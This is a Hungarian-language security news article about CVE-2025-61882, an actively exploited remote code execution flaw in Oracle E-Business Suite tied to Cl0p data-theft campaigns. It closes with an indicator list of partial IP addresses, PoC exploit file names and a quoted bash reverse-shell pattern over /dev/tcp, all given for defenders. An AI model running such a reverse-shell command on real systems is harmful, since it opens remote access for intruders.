Az Oracle október elején sürgősségi javítást adott ki az E-Business Suite egyik kritikus sebezhetőségére, amelyet a CVE-2025-61882 azonosítóval regisztráltak. A hiba CVSS pontszáma 9,8, és egy hitelesítés nélküli, hálózati http hozzáférést kihasználó távoli kódfuttatást tesz lehetővé a Concurrent Processing komponensen keresztül. Az Oracle tanácsadása egyértelműen leszögezi, hogy a hiba távolról, felhasználói belépés nélkül is kihasználható és sikeres exploit esetén tetszőleges kódfuttatást eredményezhet.
A javítást megelőzően a Cl0p csoporthoz köthető, magas volumenű adatszivárgási kampányokról érkeztek jelentések. A vizsgálatok szerint a Cl0p több sebezhetőséget is párhuzamosan használt fel, és az Oracle EBS rendszerek elleni művelet részeként tömeges e-mail kampányokat indítottak. A Mandiant szakértői kiemelték, hogy a Cl0p többek között a júliusi javítással már lezárt hibákat és most nyilvánosságra került zero-dayt egyaránt alkalmazott adatok tömeges kinyerésére. A támadók tömeges e-mail forgalom és automatizált exploitálás kombinációját használták, hogy minél több potenciális célpontnál próbálkozzanak. A nyilvános megfigyelések szerint nem csupán egyedi, célzott támadásról van szó, hanem olyan szélesebb műveletről, amelyben különböző sebezhetőségek láncolatát használták ki a belső rendszerek eléréséhez és az adatkiáramlás előkészítéséhez.
Érdemes hangsúlyozni az incidens ütemét és skáláját. Az Oracle a vizsgálat előrehaladtával további frissítéseket adott ki, hogy a nyomozás során felmerült további potenciális kihasználási lehetőségekre is reagáljon. Ez arra utal, hogy a támadás nem egyszerű, izolált exploitálási kísérlet volt, hanem olyan, dinamikusan változó kampány, ahol a támadók és a védelem egyaránt gyorsan alkalmazkodtak.
Az attribúció tekintetében a közlemények és elemzések a Cl0p-hoz (vagy Cl0phoz köthető műveletekhez) kapcsolják az eseményt, de megemlítik, hogy további aktorok és csoportok (például a „Scattered LAPSUS$ Hunters” megnevezés is szerepel a forrásokban) is jelezhetők a kapcsolódó PoC-ok és IoC-k alapján, amelyek feltételezhetően gyorsan terjednek közöttük.
A CVE-2025-61882 esetében az Oracle gyors javításkiadása szükséges és indokolt lépés volt, ugyanakkor a nyilvánosságra hozott információk alapján a sebezhetőség már aktív kihasználás alatt állt egy nagyobb, adatszivárgásokat célzó kampány részeként. A történet jól illusztrálja a modern fenyegetési környezet egyik alaptendenciáját, az exploitok és PoC-ok gyors terjedését, illetve azt, hogy a támadói műveletek gyakran több vektor és több aktor összehangolt tevékenységének eredményeképp válnak igazán károssá.
Eddig felfedezett IoC-k:
IP:
- 107.207[.]26 — (potenciális GET és POST aktivitás).
- 181.60[.]11 — (potenciális GET és POST aktivitás).
Parancs / C2-style shell snippet
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 — (kimenő TCP kapcsolat létrehozására utaló parancs/mintázat).
PoC / exploit forrásfájlok (virustotal)
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py